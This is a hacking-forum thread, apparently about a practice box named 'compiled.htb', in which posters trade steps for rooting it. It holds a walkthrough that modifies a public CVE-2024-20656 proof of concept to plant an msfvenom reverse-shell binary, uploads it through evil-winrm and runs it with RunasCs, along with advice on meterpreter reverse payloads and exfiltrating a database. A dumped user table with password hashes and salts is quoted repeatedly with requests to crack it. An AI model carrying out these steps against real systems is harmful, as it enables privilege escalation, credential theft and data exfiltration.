Posts: 41
Threads: 2
Joined: Sep 2023
i get "The Windows Installer Service could not be accessed. This can occur if the Windows Installer is not correctly installed. Contact your support personnel for assistance." when using this poc. what can be wrong?
Posts: 60
Threads: 9
Joined: Jun 2024
Can't make foot or tail of this exploit.....Could someone provide steps or some clear instructions...The steps in that website are not clear........LOL This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Accusing forum user of being a fraudster without making any deal
Posts: 124
Threads: 1
Joined: Apr 2024
Finally rooted:
clone https://github.com/Wh04m1001/CVE-2024-20656
change cmd[] to:
WCHAR cmd[] = L"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe";
change CopyFile(L"c:\\windows\\system32\\cmd.exe", L"C:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe", FALSE);
to:
CopyFile(L"c:\\tmp\\e.exe", L"C:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe", FALSE);
compile to get Expl.exe
connect to box with evil winrm
create c:\tmp
upload to it Expl.exe e.exe(shell generated msfvenom) runascs.exe
on evil-winrm run shell with runascs
net start msiserver (why the hell it is stopped  )
again on evil-winrm run Expl.exe with runas.cs
i assume everybody knows how to set up listeners to all steps 
Posts: 7
Threads: 0
Joined: Jun 2024
(Jul 28, 2024, 08:18 AM)4rrows Wrote: (Jul 28, 2024, 08:03 AM)izanamiidol Wrote: sqlite> select * from user;
1|administrator|administrator||administrator@compiled.htb|0|enabled|1bf0a9561cf076c5fc0d76e140788a91b5281609c384791839fd6e9996d3bbf5c91b8eee6bd5081e42085ed0be779c2ef86d|pbkdf2$50000$50|0|0|0||0|||6e1a6f3adbe7eab92978627431fd2984|a45c43d36dce3076158b19c2c696ef7b|en-US||1716401383|1716669640|1716669640|0|-1|1|1|0|0|0|1|0||administrator@compiled.htb|0|0|0|0|0|0|0|0|0||arc-green|0
2|richard|richard||richard@compiled.htb|0|enabled|4b4b53766fe946e7e291b106fcd6f4962934116ec9ac78a99b3bf6b06cf8568aaedd267ec02b39aeb244d83fb8b89c243b5e|pbkdf2$50000$50|0|0|0||0|||2be54ff86f147c6cb9b55c8061d82d03|d7cf2c96277dd16d95ed5c33bb524b62|en-US||1716401466|1720089561|1720089548|0|-1|1|0|0|0|0|1|0||richard@compiled.htb|0|0|0|0|2|0|0|0|0||arc-green|0
4|emily|emily||emily@compiled.htb|0|enabled|97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16|pbkdf2$50000$50|1|0|0||0|||0056552f6f2df0015762a4419b0748de|227d873cca89103cd83a976bdac52486|||1716565398|1716567763|0|0|-1|1|0|0|0|0|1|0||emily@compiled.htb|0|0|0|0|0|0|0|2|0||arc-green|0
6|temp|temp||temp@temp.com|0|enabled|716e816c94cd603e6290e3ae6ecd275093c8a690a6668af1d987609df488a353f579bbaf25cec44ab1ca6483a8fff6fc8d71|pbkdf2$50000$50|0|0|0||0|||3da88239bd34cf2d6a4d43be87140843|ddd92ee4843aa73505ac9ed103f70c25|en-US||1722146269|1722146337|1722146269|0|-1|1|0|0|0|0|1|0||temp@temp.com|0|0|0|0|2|0|0|0|0||arc-green|0
(Jul 28, 2024, 08:03 AM)izanamiidol Wrote: sqlite> select * from user;
1|administrator|administrator||administrator@compiled.htb|0|enabled|1bf0a9561cf076c5fc0d76e140788a91b5281609c384791839fd6e9996d3bbf5c91b8eee6bd5081e42085ed0be779c2ef86d|pbkdf2$50000$50|0|0|0||0|||6e1a6f3adbe7eab92978627431fd2984|a45c43d36dce3076158b19c2c696ef7b|en-US||1716401383|1716669640|1716669640|0|-1|1|1|0|0|0|1|0||administrator@compiled.htb|0|0|0|0|0|0|0|0|0||arc-green|0
2|richard|richard||richard@compiled.htb|0|enabled|4b4b53766fe946e7e291b106fcd6f4962934116ec9ac78a99b3bf6b06cf8568aaedd267ec02b39aeb244d83fb8b89c243b5e|pbkdf2$50000$50|0|0|0||0|||2be54ff86f147c6cb9b55c8061d82d03|d7cf2c96277dd16d95ed5c33bb524b62|en-US||1716401466|1720089561|1720089548|0|-1|1|0|0|0|0|1|0||richard@compiled.htb|0|0|0|0|2|0|0|0|0||arc-green|0
4|emily|emily||emily@compiled.htb|0|enabled|97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16|pbkdf2$50000$50|1|0|0||0|||0056552f6f2df0015762a4419b0748de|227d873cca89103cd83a976bdac52486|||1716565398|1716567763|0|0|-1|1|0|0|0|0|1|0||emily@compiled.htb|0|0|0|0|0|0|0|2|0||arc-green|0
6|temp|temp||temp@temp.com|0|enabled|716e816c94cd603e6290e3ae6ecd275093c8a690a6668af1d987609df488a353f579bbaf25cec44ab1ca6483a8fff6fc8d71|pbkdf2$50000$50|0|0|0||0|||3da88239bd34cf2d6a4d43be87140843|ddd92ee4843aa73505ac9ed103f70c25|en-US||1722146269|1722146337|1722146269|0|-1|1|0|0|0|0|1|0||temp@temp.com|0|0|0|0|2|0|0|0|0||arc-green|0
Help me crack this guys. Been struggling on this for a while
What is the path to this db file?
Im pretty noob on Windows, and i cant open this file, tried to find any db client, tried to exfiltrate it but it just fails every way i tried. Can u explain how to open it?
Posts: 9
Threads: 0
Joined: Jun 2024
(Jul 28, 2024, 01:54 PM)WhiteWolf666 Wrote: (Jul 28, 2024, 08:18 AM)4rrows Wrote: (Jul 28, 2024, 08:03 AM)izanamiidol Wrote: sqlite> select * from user;
1|administrator|administrator||administrator@compiled.htb|0|enabled|1bf0a9561cf076c5fc0d76e140788a91b5281609c384791839fd6e9996d3bbf5c91b8eee6bd5081e42085ed0be779c2ef86d|pbkdf2$50000$50|0|0|0||0|||6e1a6f3adbe7eab92978627431fd2984|a45c43d36dce3076158b19c2c696ef7b|en-US||1716401383|1716669640|1716669640|0|-1|1|1|0|0|0|1|0||administrator@compiled.htb|0|0|0|0|0|0|0|0|0||arc-green|0
2|richard|richard||richard@compiled.htb|0|enabled|4b4b53766fe946e7e291b106fcd6f4962934116ec9ac78a99b3bf6b06cf8568aaedd267ec02b39aeb244d83fb8b89c243b5e|pbkdf2$50000$50|0|0|0||0|||2be54ff86f147c6cb9b55c8061d82d03|d7cf2c96277dd16d95ed5c33bb524b62|en-US||1716401466|1720089561|1720089548|0|-1|1|0|0|0|0|1|0||richard@compiled.htb|0|0|0|0|2|0|0|0|0||arc-green|0
4|emily|emily||emily@compiled.htb|0|enabled|97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16|pbkdf2$50000$50|1|0|0||0|||0056552f6f2df0015762a4419b0748de|227d873cca89103cd83a976bdac52486|||1716565398|1716567763|0|0|-1|1|0|0|0|0|1|0||emily@compiled.htb|0|0|0|0|0|0|0|2|0||arc-green|0
6|temp|temp||temp@temp.com|0|enabled|716e816c94cd603e6290e3ae6ecd275093c8a690a6668af1d987609df488a353f579bbaf25cec44ab1ca6483a8fff6fc8d71|pbkdf2$50000$50|0|0|0||0|||3da88239bd34cf2d6a4d43be87140843|ddd92ee4843aa73505ac9ed103f70c25|en-US||1722146269|1722146337|1722146269|0|-1|1|0|0|0|0|1|0||temp@temp.com|0|0|0|0|2|0|0|0|0||arc-green|0
(Jul 28, 2024, 08:03 AM)izanamiidol Wrote: sqlite> select * from user;
1|administrator|administrator||administrator@compiled.htb|0|enabled|1bf0a9561cf076c5fc0d76e140788a91b5281609c384791839fd6e9996d3bbf5c91b8eee6bd5081e42085ed0be779c2ef86d|pbkdf2$50000$50|0|0|0||0|||6e1a6f3adbe7eab92978627431fd2984|a45c43d36dce3076158b19c2c696ef7b|en-US||1716401383|1716669640|1716669640|0|-1|1|1|0|0|0|1|0||administrator@compiled.htb|0|0|0|0|0|0|0|0|0||arc-green|0
2|richard|richard||richard@compiled.htb|0|enabled|4b4b53766fe946e7e291b106fcd6f4962934116ec9ac78a99b3bf6b06cf8568aaedd267ec02b39aeb244d83fb8b89c243b5e|pbkdf2$50000$50|0|0|0||0|||2be54ff86f147c6cb9b55c8061d82d03|d7cf2c96277dd16d95ed5c33bb524b62|en-US||1716401466|1720089561|1720089548|0|-1|1|0|0|0|0|1|0||richard@compiled.htb|0|0|0|0|2|0|0|0|0||arc-green|0
4|emily|emily||emily@compiled.htb|0|enabled|97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16|pbkdf2$50000$50|1|0|0||0|||0056552f6f2df0015762a4419b0748de|227d873cca89103cd83a976bdac52486|||1716565398|1716567763|0|0|-1|1|0|0|0|0|1|0||emily@compiled.htb|0|0|0|0|0|0|0|2|0||arc-green|0
6|temp|temp||temp@temp.com|0|enabled|716e816c94cd603e6290e3ae6ecd275093c8a690a6668af1d987609df488a353f579bbaf25cec44ab1ca6483a8fff6fc8d71|pbkdf2$50000$50|0|0|0||0|||3da88239bd34cf2d6a4d43be87140843|ddd92ee4843aa73505ac9ed103f70c25|en-US||1722146269|1722146337|1722146269|0|-1|1|0|0|0|0|1|0||temp@temp.com|0|0|0|0|2|0|0|0|0||arc-green|0
Help me crack this guys. Been struggling on this for a while
What is the path to this db file?
Im pretty noob on Windows, and i cant open this file, tried to find any db client, tried to exfiltrate it but it just fails every way i tried. Can u explain how to open it?
download it on kali with meterpreter
user@user: sqlite3 file.db
then extract info
Posts: 7
Threads: 0
Joined: Jun 2024
(Jul 28, 2024, 01:59 PM)l3rka Wrote: (Jul 28, 2024, 01:54 PM)WhiteWolf666 Wrote: (Jul 28, 2024, 08:18 AM)4rrows Wrote: (Jul 28, 2024, 08:03 AM)izanamiidol Wrote: sqlite> select * from user;
1|administrator|administrator||administrator@compiled.htb|0|enabled|1bf0a9561cf076c5fc0d76e140788a91b5281609c384791839fd6e9996d3bbf5c91b8eee6bd5081e42085ed0be779c2ef86d|pbkdf2$50000$50|0|0|0||0|||6e1a6f3adbe7eab92978627431fd2984|a45c43d36dce3076158b19c2c696ef7b|en-US||1716401383|1716669640|1716669640|0|-1|1|1|0|0|0|1|0||administrator@compiled.htb|0|0|0|0|0|0|0|0|0||arc-green|0
2|richard|richard||richard@compiled.htb|0|enabled|4b4b53766fe946e7e291b106fcd6f4962934116ec9ac78a99b3bf6b06cf8568aaedd267ec02b39aeb244d83fb8b89c243b5e|pbkdf2$50000$50|0|0|0||0|||2be54ff86f147c6cb9b55c8061d82d03|d7cf2c96277dd16d95ed5c33bb524b62|en-US||1716401466|1720089561|1720089548|0|-1|1|0|0|0|0|1|0||richard@compiled.htb|0|0|0|0|2|0|0|0|0||arc-green|0
4|emily|emily||emily@compiled.htb|0|enabled|97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16|pbkdf2$50000$50|1|0|0||0|||0056552f6f2df0015762a4419b0748de|227d873cca89103cd83a976bdac52486|||1716565398|1716567763|0|0|-1|1|0|0|0|0|1|0||emily@compiled.htb|0|0|0|0|0|0|0|2|0||arc-green|0
6|temp|temp||temp@temp.com|0|enabled|716e816c94cd603e6290e3ae6ecd275093c8a690a6668af1d987609df488a353f579bbaf25cec44ab1ca6483a8fff6fc8d71|pbkdf2$50000$50|0|0|0||0|||3da88239bd34cf2d6a4d43be87140843|ddd92ee4843aa73505ac9ed103f70c25|en-US||1722146269|1722146337|1722146269|0|-1|1|0|0|0|0|1|0||temp@temp.com|0|0|0|0|2|0|0|0|0||arc-green|0
(Jul 28, 2024, 08:03 AM)izanamiidol Wrote: sqlite> select * from user;
1|administrator|administrator||administrator@compiled.htb|0|enabled|1bf0a9561cf076c5fc0d76e140788a91b5281609c384791839fd6e9996d3bbf5c91b8eee6bd5081e42085ed0be779c2ef86d|pbkdf2$50000$50|0|0|0||0|||6e1a6f3adbe7eab92978627431fd2984|a45c43d36dce3076158b19c2c696ef7b|en-US||1716401383|1716669640|1716669640|0|-1|1|1|0|0|0|1|0||administrator@compiled.htb|0|0|0|0|0|0|0|0|0||arc-green|0
2|richard|richard||richard@compiled.htb|0|enabled|4b4b53766fe946e7e291b106fcd6f4962934116ec9ac78a99b3bf6b06cf8568aaedd267ec02b39aeb244d83fb8b89c243b5e|pbkdf2$50000$50|0|0|0||0|||2be54ff86f147c6cb9b55c8061d82d03|d7cf2c96277dd16d95ed5c33bb524b62|en-US||1716401466|1720089561|1720089548|0|-1|1|0|0|0|0|1|0||richard@compiled.htb|0|0|0|0|2|0|0|0|0||arc-green|0
4|emily|emily||emily@compiled.htb|0|enabled|97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16|pbkdf2$50000$50|1|0|0||0|||0056552f6f2df0015762a4419b0748de|227d873cca89103cd83a976bdac52486|||1716565398|1716567763|0|0|-1|1|0|0|0|0|1|0||emily@compiled.htb|0|0|0|0|0|0|0|2|0||arc-green|0
6|temp|temp||temp@temp.com|0|enabled|716e816c94cd603e6290e3ae6ecd275093c8a690a6668af1d987609df488a353f579bbaf25cec44ab1ca6483a8fff6fc8d71|pbkdf2$50000$50|0|0|0||0|||3da88239bd34cf2d6a4d43be87140843|ddd92ee4843aa73505ac9ed103f70c25|en-US||1722146269|1722146337|1722146269|0|-1|1|0|0|0|0|1|0||temp@temp.com|0|0|0|0|2|0|0|0|0||arc-green|0
Help me crack this guys. Been struggling on this for a while
What is the path to this db file?
Im pretty noob on Windows, and i cant open this file, tried to find any db client, tried to exfiltrate it but it just fails every way i tried. Can u explain how to open it?
download it on kali with meterpreter
user@user: sqlite3 file.db
then extract info
Didnt manage to spawn meterpreter, got a shell powershell, but when i launch a meterpreter with msfvenom payload i end up with a "session X is not valid and will be closed"
Posts: 9
Threads: 0
Joined: Jun 2024
(Jul 28, 2024, 02:58 PM)WhiteWolf666 Wrote: (Jul 28, 2024, 01:59 PM)l3rka Wrote: (Jul 28, 2024, 01:54 PM)WhiteWolf666 Wrote: (Jul 28, 2024, 08:18 AM)4rrows Wrote: (Jul 28, 2024, 08:03 AM)izanamiidol Wrote: sqlite> select * from user;
1|administrator|administrator||administrator@compiled.htb|0|enabled|1bf0a9561cf076c5fc0d76e140788a91b5281609c384791839fd6e9996d3bbf5c91b8eee6bd5081e42085ed0be779c2ef86d|pbkdf2$50000$50|0|0|0||0|||6e1a6f3adbe7eab92978627431fd2984|a45c43d36dce3076158b19c2c696ef7b|en-US||1716401383|1716669640|1716669640|0|-1|1|1|0|0|0|1|0||administrator@compiled.htb|0|0|0|0|0|0|0|0|0||arc-green|0
2|richard|richard||richard@compiled.htb|0|enabled|4b4b53766fe946e7e291b106fcd6f4962934116ec9ac78a99b3bf6b06cf8568aaedd267ec02b39aeb244d83fb8b89c243b5e|pbkdf2$50000$50|0|0|0||0|||2be54ff86f147c6cb9b55c8061d82d03|d7cf2c96277dd16d95ed5c33bb524b62|en-US||1716401466|1720089561|1720089548|0|-1|1|0|0|0|0|1|0||richard@compiled.htb|0|0|0|0|2|0|0|0|0||arc-green|0
4|emily|emily||emily@compiled.htb|0|enabled|97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16|pbkdf2$50000$50|1|0|0||0|||0056552f6f2df0015762a4419b0748de|227d873cca89103cd83a976bdac52486|||1716565398|1716567763|0|0|-1|1|0|0|0|0|1|0||emily@compiled.htb|0|0|0|0|0|0|0|2|0||arc-green|0
6|temp|temp||temp@temp.com|0|enabled|716e816c94cd603e6290e3ae6ecd275093c8a690a6668af1d987609df488a353f579bbaf25cec44ab1ca6483a8fff6fc8d71|pbkdf2$50000$50|0|0|0||0|||3da88239bd34cf2d6a4d43be87140843|ddd92ee4843aa73505ac9ed103f70c25|en-US||1722146269|1722146337|1722146269|0|-1|1|0|0|0|0|1|0||temp@temp.com|0|0|0|0|2|0|0|0|0||arc-green|0
Help me crack this guys. Been struggling on this for a while
What is the path to this db file?
Im pretty noob on Windows, and i cant open this file, tried to find any db client, tried to exfiltrate it but it just fails every way i tried. Can u explain how to open it?
download it on kali with meterpreter
user@user: sqlite3 file.db
then extract info
Didnt manage to spawn meterpreter, got a shell powershell, but when i launch a meterpreter with msfvenom payload i end up with a "session X is not valid and will be closed"
Try another payload rev_tcp or rev_http
or run post /shell_to_meterpreter
Posts: 7
Threads: 0
Joined: Jun 2024
(Jul 28, 2024, 03:12 PM)l3rka Wrote: (Jul 28, 2024, 02:58 PM)WhiteWolf666 Wrote: (Jul 28, 2024, 01:59 PM)l3rka Wrote: (Jul 28, 2024, 01:54 PM)WhiteWolf666 Wrote: (Jul 28, 2024, 08:18 AM)4rrows Wrote: What is the path to this db file?
Im pretty noob on Windows, and i cant open this file, tried to find any db client, tried to exfiltrate it but it just fails every way i tried. Can u explain how to open it?
download it on kali with meterpreter
user@user: sqlite3 file.db
then extract info
Didnt manage to spawn meterpreter, got a shell powershell, but when i launch a meterpreter with msfvenom payload i end up with a "session X is not valid and will be closed"
Try another payload rev_tcp or rev_http
or run post /shell_to_meterpreter Already tested multiple, both in x86 and x64 bc didnt knew wich arch it was, always get the same return, could it come from the fact that i dont have a full shell? (example if a command fail I dont have a display , i need to type $Error[0] to get it)
Posts: 30
Threads: 0
Joined: May 2024
Jul 28, 2024, 03:53 PM
(This post was last modified: Jul 28, 2024, 04:17 PM by wtfduw.)
(Jul 28, 2024, 02:20 PM)gihimlek Wrote: (Jul 28, 2024, 01:51 PM)jsvensson Wrote: Finally rooted:
clone https://github.com/Wh04m1001/CVE-2024-20656
change cmd[] to:
WCHAR cmd[] = L"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe";
change CopyFile(L"c:\\windows\\system32\\cmd.exe", L"C:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe", FALSE);
to:
CopyFile(L"c:\\tmp\\e.exe", L"C:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe", FALSE);
compile to get Expl.exe
connect to box with evil winrm
create c:\tmp
upload to it Expl.exe e.exe(shell generated msfvenom) runascs.exe
on evil-winrm run shell with runascs
net start msiserver (why the hell it is stopped )
again on evil-winrm run Expl.exe with runas.cs
i assume everybody knows how to set up listeners to all steps
Hey, didn't quite get the last steps, uploaded expl.exe, e.exe and RunasCs.exe to the machine, runmned .\Expl.exe after starting msiserver but got no output nor shell on listener
(Jul 28, 2024, 02:13 PM)spamdegratis5 Wrote: (Jul 28, 2024, 01:51 PM)jsvensson Wrote: Finally rooted:
clone https://github.com/Wh04m1001/CVE-2024-20656
change cmd[] to:
WCHAR cmd[] = L"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe";
change CopyFile(L"c:\\windows\\system32\\cmd.exe", L"C:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe", FALSE);
to:
CopyFile(L"c:\\tmp\\e.exe", L"C:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe", FALSE);
compile to get Expl.exe
connect to box with evil winrm
create c:\tmp
upload to it Expl.exe e.exe(shell generated msfvenom) runascs.exe
on evil-winrm run shell with runascs
net start msiserver (why the hell it is stopped )
again on evil-winrm run Expl.exe with runas.cs
i assume everybody knows how to set up listeners to all steps
How much did it take to trigger your payload? After reading the blog about this vulnerability, I understand that it takes some minutes until the msiexec finishes "repairing" the installation, am I wrong? Nevermind, the trick was RunasCs.exe, the fucking evil-winrm shell doesn't execute correctly the exploit due to credentials not being in the session, that's the reason you can't even query the status of the service
sc.exe qc VSStandardCollectorService150
You just ran the exploit.exe file? I'm running it but not getting anything back
(Jul 28, 2024, 02:20 PM)gihimlek Wrote: (Jul 28, 2024, 01:51 PM)jsvensson Wrote: Finally rooted:
clone https://github.com/Wh04m1001/CVE-2024-20656
change cmd[] to:
WCHAR cmd[] = L"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe";
change CopyFile(L"c:\\windows\\system32\\cmd.exe", L"C:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe", FALSE);
to:
CopyFile(L"c:\\tmp\\e.exe", L"C:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe", FALSE);
compile to get Expl.exe
connect to box with evil winrm
create c:\tmp
upload to it Expl.exe e.exe(shell generated msfvenom) runascs.exe
on evil-winrm run shell with runascs
net start msiserver (why the hell it is stopped )
again on evil-winrm run Expl.exe with runas.cs
i assume everybody knows how to set up listeners to all steps
Hey, didn't quite get the last steps, uploaded expl.exe, e.exe and RunasCs.exe to the machine, runmned .\Expl.exe after starting msiserver but got no output nor shell on listener
(Jul 28, 2024, 02:13 PM)spamdegratis5 Wrote: (Jul 28, 2024, 01:51 PM)jsvensson Wrote: Finally rooted:
clone https://github.com/Wh04m1001/CVE-2024-20656
change cmd[] to:
WCHAR cmd[] = L"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe";
change CopyFile(L"c:\\windows\\system32\\cmd.exe", L"C:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe", FALSE);
to:
CopyFile(L"c:\\tmp\\e.exe", L"C:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe", FALSE);
compile to get Expl.exe
connect to box with evil winrm
create c:\tmp
upload to it Expl.exe e.exe(shell generated msfvenom) runascs.exe
on evil-winrm run shell with runascs
net start msiserver (why the hell it is stopped )
again on evil-winrm run Expl.exe with runas.cs
i assume everybody knows how to set up listeners to all steps
How much did it take to trigger your payload? After reading the blog about this vulnerability, I understand that it takes some minutes until the msiexec finishes "repairing" the installation, am I wrong? Nevermind, the trick was RunasCs.exe, the fucking evil-winrm shell doesn't execute correctly the exploit due to credentials not being in the session, that's the reason you can't even query the status of the service
sc.exe qc VSStandardCollectorService150
You just ran the exploit.exe file? I'm running it but not getting anything back
Nvm, was using the debug version, release works
Hey what is the command you ran using RunasCs.exe ?
I am running :
./runascs.exe emily 12345678 "c:/users/emily/expl.exe"
but getting this response: "No output received from the process."
tried with both tcp and http reverse shell. Any thoughts?
(also compiled expl.exe with the new cmd[] and CopyFile) This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.
Posts: 196
Threads: 31
Joined: Apr 2024
(Jul 28, 2024, 03:32 PM)WhiteWolf666 Wrote: (Jul 28, 2024, 03:12 PM)l3rka Wrote: (Jul 28, 2024, 02:58 PM)WhiteWolf666 Wrote: (Jul 28, 2024, 01:59 PM)l3rka Wrote: (Jul 28, 2024, 01:54 PM)WhiteWolf666 Wrote: Im pretty noob on Windows, and i cant open this file, tried to find any db client, tried to exfiltrate it but it just fails every way i tried. Can u explain how to open it?
download it on kali with meterpreter
user@user: sqlite3 file.db
then extract info
Didnt manage to spawn meterpreter, got a shell powershell, but when i launch a meterpreter with msfvenom payload i end up with a "session X is not valid and will be closed"
Try another payload rev_tcp or rev_http
or run post /shell_to_meterpreter Already tested multiple, both in x86 and x64 bc didnt knew wich arch it was, always get the same return, could it come from the fact that i dont have a full shell? (example if a command fail I dont have a display , i need to type $Error[0] to get it)
just use httpuploadexfil to get it off the box
|
